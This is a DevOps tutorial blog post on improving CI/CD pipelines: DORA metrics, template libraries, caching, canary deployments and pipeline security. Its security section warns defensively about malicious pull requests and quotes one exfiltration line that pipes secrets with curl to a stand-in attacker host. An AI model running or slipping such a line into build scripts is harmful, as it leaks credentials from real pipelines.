💬 Welcome to Pipeline Therapy
Let me describe your CI/CD pipeline. Stop me when I'm wrong:
- It takes 42 minutes to build and deploy
- Nobody knows exactly what it does (the YAML is 800 lines)
- Each team has their own custom pipeline because "our needs are different"
- Flaky tests fail 20% of the time, and everyone just re-runs the pipeline
- There's a manual approval step where someone clicks "Approve" without looking
- Someone set it up 3 years ago and that person doesn't work here anymore
Was I close? 😏
Let's fix all of this.
📊 DORA Metrics: How to Know If You're Actually Good
Before fixing anything, you need to measure where you stand. Google's DORA research (14,000+ teams studied) identified 4 key metrics that predict software delivery performance:
| Metric | Elite | "We Need Help" |
|---|---|---|
| Deployment Frequency | Multiple per day | Monthly or less |
| Lead Time for Changes | < 1 hour | > 1 month |
| Change Failure Rate | 0-15% | > 45% |
| Mean Time to Recovery | < 1 hour | > 6 months |
Here's the Uncomfortable Truth
If your team deploys once a week, your lead time is 3 days, and your change failure rate is 30%, you are statistically average. Not bad, but not good either.
Elite teams deploy hundreds of times per day with less than a 15% failure rate. They're not smarter; they have better pipelines, smaller changes, and more automation.
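To make the definitions concrete, here's a back-of-the-envelope sketch in plain Python that computes all four metrics from deployment records. The event data is invented for illustration:

```python
from datetime import datetime, timedelta

# Hypothetical records: (merged_at, deployed_at, caused_incident, restored_at)
deploys = [
    (datetime(2024, 1, 1, 9), datetime(2024, 1, 1, 10), False, None),
    (datetime(2024, 1, 2, 9), datetime(2024, 1, 2, 11), True,
     datetime(2024, 1, 2, 12)),
    (datetime(2024, 1, 3, 9), datetime(2024, 1, 3, 10), False, None),
    (datetime(2024, 1, 4, 9), datetime(2024, 1, 4, 10), False, None),
]

days_observed = 4
deployment_frequency = len(deploys) / days_observed         # deploys per day
lead_times = [d[1] - d[0] for d in deploys]                 # merge -> production
lead_time = sum(lead_times, timedelta()) / len(lead_times)
failures = [d for d in deploys if d[2]]
change_failure_rate = len(failures) / len(deploys)          # fraction of bad deploys
mttr = sum((d[3] - d[1] for d in failures), timedelta()) / len(failures)

print(deployment_frequency)   # 1.0 (one deploy per day)
print(lead_time)              # 1:15:00
print(change_failure_rate)    # 0.25
print(mttr)                   # 1:00:00
```

On this toy data the team deploys daily with a 25% failure rate: better than "we need help", nowhere near elite.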
How to Track DORA Now
```yaml
# GitHub Actions: track deployment frequency
- name: Record deployment
  run: |
    curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \
      -H "Content-Type: application/json" \
      -d '{
        "event": "deployment",
        "service": "${{ github.repository }}",
        "environment": "production",
        "sha": "${{ github.sha }}",
        "timestamp": "'"$(date -u +%Y-%m-%dT%H:%M:%SZ)"'"
      }'
```
Or use tools like Sleuth, LinearB, or GitHub's built-in DORA metrics (available in GitHub Insights for Enterprise).
🏗️ Pipeline Architecture: The Template Library Pattern
The Anti-Pattern: Every Team Reinvents the Wheel
Team Alpha: 800-line custom YAML → Azure DevOps
Team Bravo: 600-line custom YAML → Azure DevOps (different structure)
Team Charlie: "We just deploy from our laptops" → 😱
Result:
- 3 different security scanning approaches
- 2 teams forgot to add container image scanning
- 1 team has no tests in their pipeline
- Nobody can help debug another team's pipeline
The Solution: Shared Template Library
```
┌────────────────────────────────────────────────────┐
│          Shared Template Library (v2.5.0)          │
│                                                    │
│  ┌───────────┐  ┌───────────┐  ┌───────────────┐   │
│  │ Build     │  │ Test      │  │ Security      │   │
│  │ Template  │  │ Template  │  │ Scan Template │   │
│  │ (.NET,    │  │ (unit,    │  │ (Trivy,       │   │
│  │  Node,    │  │  integ,   │  │  Checkov)     │   │
│  │  Python)  │  │  e2e)     │  │               │   │
│  └───────────┘  └───────────┘  └───────────────┘   │
│  ┌───────────┐  ┌───────────┐  ┌───────────────┐   │
│  │ Deploy    │  │ Notify    │  │ Rollback      │   │
│  │ Template  │  │ Template  │  │ Template      │   │
│  │ (K8s,     │  │ (Slack,   │  │ (auto/        │   │
│  │  AppSvc)  │  │  Teams)   │  │  manual)      │   │
│  └───────────┘  └───────────┘  └───────────────┘   │
└────────────────────────────────────────────────────┘
                      │ consumed by
                      ▼
┌────────────────────────────────────────────────────┐
│         Team pipelines (10-20 lines each!)         │
│  "Use build template, test template, deploy        │
│   template: just tell it your service name"        │
└────────────────────────────────────────────────────┘
```
Azure DevOps: Template Library in Action
```yaml
# Team's pipeline: SHORT and STANDARD
trigger:
  branches:
    include: [main]

resources:
  repositories:
    - repository: templates
      type: git
      name: platform/pipeline-templates
      ref: refs/tags/v2.5.0  # 📌 Always pin the version!

stages:
  - template: stages/ci.yml@templates
    parameters:
      language: dotnet
      dotnetVersion: '8.0'
      testProjects: '**/*Tests.csproj'

  - template: stages/security-scan.yml@templates
    parameters:
      trivySeverity: 'CRITICAL,HIGH'

  - template: stages/deploy-k8s.yml@templates
    parameters:
      environment: staging
      aksCluster: aks-staging-eastus
      namespace: payments

  - template: stages/deploy-k8s.yml@templates
    parameters:
      environment: production
      aksCluster: aks-prod-eastus
      namespace: payments
      requireApproval: true
```
GitHub Actions: Reusable Workflows
```yaml
# .github/workflows/deploy.yml -- Team's workflow
name: Deploy

on:
  push:
    branches: [main]

jobs:
  build-and-test:
    uses: myorg/shared-workflows/.github/workflows/build-dotnet.yml@v2.5.0
    with:
      dotnet-version: '8.0'
      project-path: 'src/PaymentService'

  security-scan:
    needs: build-and-test
    uses: myorg/shared-workflows/.github/workflows/security-scan.yml@v2.5.0
    with:
      image: ${{ needs.build-and-test.outputs.image }}

  deploy:
    needs: [build-and-test, security-scan]
    uses: myorg/shared-workflows/.github/workflows/deploy-k8s.yml@v2.5.0
    with:
      environment: production
      image: ${{ needs.build-and-test.outputs.image }}
    secrets: inherit
```
⚡ Pipeline Performance: From 45 Minutes to 5
Where's the Time Going?
In my experience auditing pipelines, here's where time hides:
```
Typical 45-minute pipeline breakdown:
──────────────────────────────────────────────────
 7 min   ███████        Agent startup + checkout
12 min   ████████████   Dependency install (npm/nuget)
 5 min   █████          Build
 8 min   ████████       Tests (running ALL tests sequentially)
 3 min   ███            Docker build (no layer caching)
 5 min   █████          Security scanning
 5 min   █████          Deploy + smoke tests
──────────────────────────────────────────────────
45 min total 😤

Optimized 5-minute pipeline:
──────────────────────────────────────────────────
0.5 min  █              Cached checkout
0.5 min  █              Cached dependencies
1 min    ██             Incremental build
1 min    ██             Parallel tests (affected only)
0.5 min  █              Docker build (cached layers)
1 min    ██             Parallel: scan + deploy
0.5 min  █              Smoke test
──────────────────────────────────────────────────
5 min total 🚀
```
The Optimization Playbook
1. Cache Everything

```yaml
# GitHub Actions: cache node_modules
- uses: actions/cache@v4
  with:
    path: ~/.npm
    key: npm-${{ hashFiles('**/package-lock.json') }}
    restore-keys: npm-
```

```yaml
# Azure DevOps: cache NuGet packages
- task: Cache@2
  inputs:
    key: 'nuget | "$(Agent.OS)" | **/packages.lock.json'
    restoreKeys: 'nuget | "$(Agent.OS)"'
    path: $(NUGET_PACKAGES)
```
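The `hashFiles(...)` key above is just a content hash: if the lock file hasn't changed, the key is identical and the cache hits; any dependency bump produces a new key and a clean install. A tiny sketch of the idea in plain Python (the lock file contents are invented):

```python
import hashlib

def cache_key(lockfile_contents: str) -> str:
    """Mimic hashFiles(): derive the cache key from the lock file's content."""
    digest = hashlib.sha256(lockfile_contents.encode()).hexdigest()
    return f"npm-{digest[:12]}"

v1 = cache_key('{"lodash": "4.17.21"}')
v2 = cache_key('{"lodash": "4.17.21"}')  # unchanged lock file -> same key, cache hit
v3 = cache_key('{"lodash": "4.17.22"}')  # dependency bump -> new key, cache miss

assert v1 == v2 and v1 != v3
```

That's also why `restore-keys: npm-` matters: on a miss, the runner falls back to the newest cache with that prefix, so you still restore most packages instead of starting cold.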
2. Docker Layer Caching

```dockerfile
# BAD: copying everything first busts the cache on any file change
COPY . .
RUN npm install

# GOOD: copy package files first, install, THEN copy code
COPY package.json package-lock.json ./
RUN npm ci --production
COPY . .
# Now code changes don't re-trigger npm install
```
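The rule behind this: Docker reuses cached layers top-down until the first instruction whose input changed, and everything below that point is rebuilt. A rough simulation of that invalidation rule (plain Python, hypothetical layer names):

```python
def layers_to_rebuild(instructions, changed_inputs):
    """Walk layers top-down; once one layer's input changed, all later layers rebuild."""
    rebuilt, cache_broken = [], False
    for instruction, input_id in instructions:
        if input_id in changed_inputs:
            cache_broken = True
        if cache_broken:
            rebuilt.append(instruction)
    return rebuilt

# GOOD ordering: package manifests copied before the source tree
dockerfile = [
    ("COPY package*.json ./", "lockfile"),
    ("RUN npm ci",            "lockfile"),   # depends only on the lock file
    ("COPY . .",              "source"),
]

# Only application code changed: the npm ci layer stays cached
print(layers_to_rebuild(dockerfile, {"source"}))     # ['COPY . .']
# Lock file changed: everything from the install down rebuilds
print(layers_to_rebuild(dockerfile, {"lockfile"}))   # all three layers
```

With the BAD ordering (`COPY . .` first), every layer depends on the source tree, so a one-line code change rebuilds the install layer every time.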
3. Run Tests in Parallel

```yaml
# GitHub Actions: matrix strategy
jobs:
  test:
    strategy:
      matrix:
        shard: [1, 2, 3, 4]
    steps:
      - run: npm test -- --shard=${{ matrix.shard }}/4
```
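Sharding only helps if every job deterministically picks a disjoint slice of the suite, so the four shards together run each test exactly once. The usual trick, sketched in plain Python (runners like Jest and Playwright implement `--shard=i/n` along these lines, though the exact assignment varies):

```python
def shard(tests, index, total):
    """Shard `index` (1-based) takes every `total`-th test from a stable ordering."""
    return [t for i, t in enumerate(sorted(tests)) if i % total == index - 1]

tests = [f"test_{c}" for c in "abcdefghij"]   # 10 hypothetical tests
shards = [shard(tests, i, 4) for i in range(1, 5)]

# Disjoint and complete: each test lands in exactly one shard
flat = sorted(t for s in shards for t in s)
assert flat == sorted(tests)
print([len(s) for s in shards])   # [3, 3, 2, 2]
```

The `sorted()` is the important part: every shard must see the same ordering, or tests get skipped or run twice.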
4. Only Test What Changed

```yaml
# For monorepos: detect which service changed
- uses: dorny/paths-filter@v3
  id: changes
  with:
    filters: |
      payments:
        - 'services/payments/**'
      users:
        - 'services/users/**'

- name: Test payments
  if: steps.changes.outputs.payments == 'true'
  run: cd services/payments && npm test
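Under the hood, path filtering is just glob matching against the diff. A minimal sketch in plain Python (the filter table and file paths are invented; note that `fnmatch`'s `*` crosses directory separators, so a single `*` here behaves like the `**` in the YAML above):

```python
from fnmatch import fnmatch

FILTERS = {
    "payments": ["services/payments/*"],
    "users":    ["services/users/*"],
}

def affected_services(changed_files):
    """Return the services whose path filters match at least one changed file."""
    return sorted(
        name for name, patterns in FILTERS.items()
        if any(fnmatch(f, p) for f in changed_files for p in patterns)
    )

print(affected_services(["services/payments/api.js", "README.md"]))  # ['payments']
```

Each service's test job then keys off this result, exactly like the `if:` condition on the step above.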
🚨 Real-World Disaster #1: The Self-Hosted Runner That Poisoned Everything
The Error:

```
ERROR: npm ERR! ENOSPC: no space left on device
```
What Happened: Self-hosted build agents accumulated Docker images, node_modules caches, and build artifacts over months. Disk filled up. Builds started failing randomly across all teams.
Worse: One build left behind a corrupted node_modules folder. The next build on the same agent used the cached corruption and deployed a broken application.
The Fix:
- Use ephemeral agents (a fresh VM or container per build): Azure DevOps scale set agents or GitHub-hosted runners
- If self-hosted, add a cleanup step that always runs:

```yaml
# GitHub Actions syntax; in Azure DevOps, use `condition: always()` on the step
- name: Agent cleanup
  if: always()
  run: |
    docker system prune -af --volumes
    rm -rf /tmp/build-*
```
🚢 Deployment Strategies: How to Ship Without Sinking
The Deployment Strategy Menu
| Strategy | Risk | Speed | Rollback | Best For |
|---|---|---|---|---|
| Rolling Update | Med | Fast | Slow | Default K8s strategy |
| Blue-Green | Low | Fast | Instant | Stateless services |
| Canary | Low | Slow | Fast | High-risk changes |
| Feature Flags | Lowest | Instant | Instant | Business logic changes |
Canary Deployment: The Smart Way to Ship
```
Step 1: Deploy new version to 5% of traffic
┌──────────────────────────────────┐
│ 95% traffic → v1.0 (3 pods)      │
│  5% traffic → v2.0 (1 pod)       │ ← watch error rates, latency
└──────────────────────────────────┘

Step 2: If metrics look good, increase to 25%
┌──────────────────────────────────┐
│ 75% traffic → v1.0 (3 pods)      │
│ 25% traffic → v2.0 (1 pod)       │ ← still watching...
└──────────────────────────────────┘

Step 3: If still good, go to 100%
┌──────────────────────────────────┐
│ 100% traffic → v2.0 (3 pods)     │ ← 🎉 full rollout
└──────────────────────────────────┘

Step ABORT: If any stage looks bad
┌──────────────────────────────────┐
│ 100% traffic → v1.0 (3 pods)     │ ← 😅 safely rolled back
│   0% traffic → v2.0 (removed)    │
└──────────────────────────────────┘
```
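The promotion logic behind those steps is simple enough to sketch: at each traffic weight, compare the canary's error rate against the baseline and abort the moment it degrades. A toy version in plain Python (in practice, tools like Argo Rollouts or Flagger drive this from live metrics; the error-rate functions here are invented):

```python
def run_canary(stages, baseline_error_rate, canary_error_rate_at, tolerance=0.01):
    """Walk the traffic weights; promote only while the canary stays within tolerance."""
    for weight in stages:
        if canary_error_rate_at(weight) > baseline_error_rate + tolerance:
            return f"ROLLBACK at {weight}%"   # shift 100% of traffic back to v1.0
    return "PROMOTED to 100%"

healthy = lambda weight: 0.002                             # v2.0 behaves like v1.0
leaky   = lambda weight: 0.002 if weight <= 5 else 0.08    # degrades under real load

print(run_canary([5, 25, 100], 0.002, healthy))   # PROMOTED to 100%
print(run_canary([5, 25, 100], 0.002, leaky))     # ROLLBACK at 25%
```

Note the second case: the problem only appears at 25% traffic, which is exactly why you ramp in stages instead of jumping straight from 5% to 100%.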
🚨 Real-World Disaster #2: The Friday 5 PM Deployment
What Happened: Team deploys at 5:07 PM on Friday (bad idea, but deadlines). Rolling update replaces all 3 pods. New version has a memory leak that manifests after 4 hours. At 9 PM, pods start getting OOMKilled. Nobody's monitoring. By Saturday morning, the payment service has been down for 12 hours.
If they had used canary: The 5% canary pod would have shown increasing memory usage within 2 hours. Automated rollback triggers at 7 PM. 95% of users never noticed. Team enjoys their weekend.
The Golden Rules:
- Never deploy on Friday (unless you have canary + automated rollback)
- Never deploy during peak hours (find your low-traffic window)
- Always have automated rollback based on error rates and latency
- Small changes, frequent deploys > big changes, occasional deploys
🔒 Pipeline Security: Your Pipeline is an Attack Vector
Your CI/CD pipeline has more access than most developers:
- It can push code to production
- It has access to secrets and credentials
- It can modify infrastructure
- It downloads code from the internet (dependencies)
Things That Should Scare You
Scary Thing #1: Secrets in pipeline logs

```
┌──────────────────────────────────────────────┐
│ Step: Deploy                                 │
│ $ echo $DATABASE_CONNECTION_STRING           │
│ Server=prod.db.windows.net;Password=Pa$$w0rd │ ← 🚫
└──────────────────────────────────────────────┘
```

Scary Thing #2: Pull request pipelines run arbitrary code

```
┌──────────────────────────────────────────────┐
│ External contributor opens PR                │
│ PR changes build script to:                  │
│   echo $SECRETS | curl attacker.com          │
│ Pipeline runs automatically...               │ ← 😱
└──────────────────────────────────────────────┘
```

Scary Thing #3: Dependency confusion attacks

```
┌──────────────────────────────────────────────┐
│ Internal package:  @mycompany/utils          │
│ Attacker publishes @mycompany/utils on npm   │
│ Pipeline installs the public one first...    │ ← 📦
└──────────────────────────────────────────────┘
```
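You can catch dependency confusion in CI with a lock-file audit: every package in your internal scope must resolve from your private registry, never from the public one. A minimal sketch in plain Python (the scope, registry URL, and lock entries are hypothetical):

```python
INTERNAL_SCOPE = "@mycompany/"
PRIVATE_REGISTRY = "https://pkgs.mycompany.com/"   # hypothetical private feed

def confused_packages(lock_entries):
    """Flag internal-scope packages whose resolved URL is NOT the private registry."""
    return [
        name for name, resolved in lock_entries.items()
        if name.startswith(INTERNAL_SCOPE)
        and not resolved.startswith(PRIVATE_REGISTRY)
    ]

lock = {
    "@mycompany/utils": "https://registry.npmjs.org/@mycompany/utils/-/utils-9.9.9.tgz",
    "@mycompany/auth":  "https://pkgs.mycompany.com/@mycompany/auth/-/auth-1.2.0.tgz",
    "lodash":           "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
}

print(confused_packages(lock))   # ['@mycompany/utils']  <- fail the build on this
```

Run a check like this as a pipeline gate: if the list is non-empty, the build fails before anything gets installed or deployed.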
Pipeline Security Checklist
Authentication:
- ✅ OIDC federation (no long-lived secrets in pipelines)
- ✅ Managed Identity for Azure resources
- ✅ Short-lived tokens (expire in minutes, not months)

Authorization:
- ✅ Pipeline can only deploy to its own service
- ✅ Production deploys require an approved PR + passing checks
- ✅ Environment protection rules with required reviewers

Dependencies:
- ✅ Lock files committed (package-lock.json, go.sum)
- ✅ Dependency scanning (Dependabot, Snyk)
- ✅ Private package registry for internal packages

Secrets:
- ✅ Never echo/print secrets in logs
- ✅ Use secret masking in pipeline variables
- ✅ Rotate secrets automatically
- ✅ Audit who accesses which secret
🚨 Real-World Disaster #3: The Secret That Wasn't Secret
What Happened: A developer added a debug step to a pipeline:
```yaml
- name: Debug connection
  run: |
    echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}"
```
GitHub/Azure DevOps masks secrets in logs... usually. But this string was partially masked because it contained special characters that broke the masking regex. The full production database password appeared in the build log. The build log was accessible to 200 developers.
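That failure mode is easy to reproduce: a naive masker that feeds the secret straight into a regex silently stops matching when the secret contains metacharacters like `$`. A sketch in plain Python (the secret and log line are invented; real CI maskers are more sophisticated, but the pitfall is the same):

```python
import re

secret = "Pa$$w0rd"
log = "Connecting with password Pa$$w0rd to prod"

# BROKEN: '$' is a regex anchor, so this pattern can never match the literal secret
naive = re.sub(secret, "***", log)
assert secret in naive            # the secret leaked into the "masked" log!

# FIXED: escape the secret (or use plain str.replace) before matching
safe = re.sub(re.escape(secret), "***", log)
assert secret not in safe         # now actually masked
```

The deeper lesson stands either way: masking is a last line of defense, not a guarantee, which is why removing the secret entirely (OIDC) beats hoping the masker catches it.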
The Fix:
- Remove all `echo`/`print` statements that reference secrets
- Use OIDC federation so there are no secrets to leak:
```yaml
# GitHub Actions: OIDC to Azure (no secrets!)
permissions:
  id-token: write
  contents: read

steps:
  - uses: azure/login@v2
    with:
      client-id: ${{ vars.AZURE_CLIENT_ID }}   # Not a secret!
      tenant-id: ${{ vars.AZURE_TENANT_ID }}
      subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}
```
🐈 Multi-Team Governance: Herding Cats With Guardrails
At the Principal level, you're not just building pipelines; you're building the pipeline platform that 10+ teams use. Here's how to standardize without becoming a bottleneck:
| Platform Team Provides | App Teams Customize |
|---|---|
| ✅ Template library | ✅ Service name & config |
| ✅ Security scanning | ✅ Test commands |
| ✅ Deployment strategies | ✅ Environment-specific vars |
| ✅ Secret management pattern | ✅ Notification channels |
| ✅ DORA metrics collection | ✅ Deployment schedule |
| ✅ Compliance guardrails | ✅ Custom test stages |
The Inner Source Model
Template repo: platform/pipeline-templates
βββ Maintained by platform team
βββ Versioned with semantic versioning (v2.5.0)
βββ Teams consume via git tags (immutable reference)
βββ Breaking changes = major version bump
βββ Teams can contribute improvements via PR
βββ Monthly "template office hours" for questions
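The "breaking changes = major version bump" rule gives consuming teams a mechanical upgrade policy: minor and patch bumps of the template tag are safe to adopt, a major bump means read the migration notes first. A tiny sketch of that check in plain Python (version parsing simplified for illustration):

```python
def is_breaking(current: str, candidate: str) -> bool:
    """Per semver, a major-version bump signals a breaking template change."""
    major = lambda tag: int(tag.lstrip("v").split(".")[0])
    return major(candidate) > major(current)

print(is_breaking("v2.5.0", "v2.6.0"))   # False: safe to adopt automatically
print(is_breaking("v2.5.0", "v3.0.0"))   # True: teams must migrate deliberately
```

A bot (Renovate, Dependabot, or a small script like this) can then auto-PR the safe bumps and flag the breaking ones for human review.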
🎯 Key Takeaways
- Measure DORA metrics: you can't improve what you don't measure
- Template libraries standardize quality without removing team autonomy
- Cache everything to cut build times by 80%+
- Canary deployments are the safest way to ship to production
- OIDC federation eliminates the #1 pipeline security risk (leaked secrets)
- Never deploy on Friday. Just don't. 🙏
📥 Homework
- Time your pipeline end-to-end. Write down the duration of each step. Find the biggest bottleneck.
- Check if your pipeline uses long-lived secrets. Replace one with OIDC federation.
- Add caching for dependencies if you haven't already, then measure the before/after build time.
Next up in the series: **Your App is on Fire and You Don't Even Know: Observability for Humans**, where we decode metrics, logs, traces, and why alert fatigue is slowly killing your team.
💬 What's the longest CI/CD pipeline you've ever suffered through? I once saw a 3-hour Java build. Yes, three hours. Share your pain below. 👇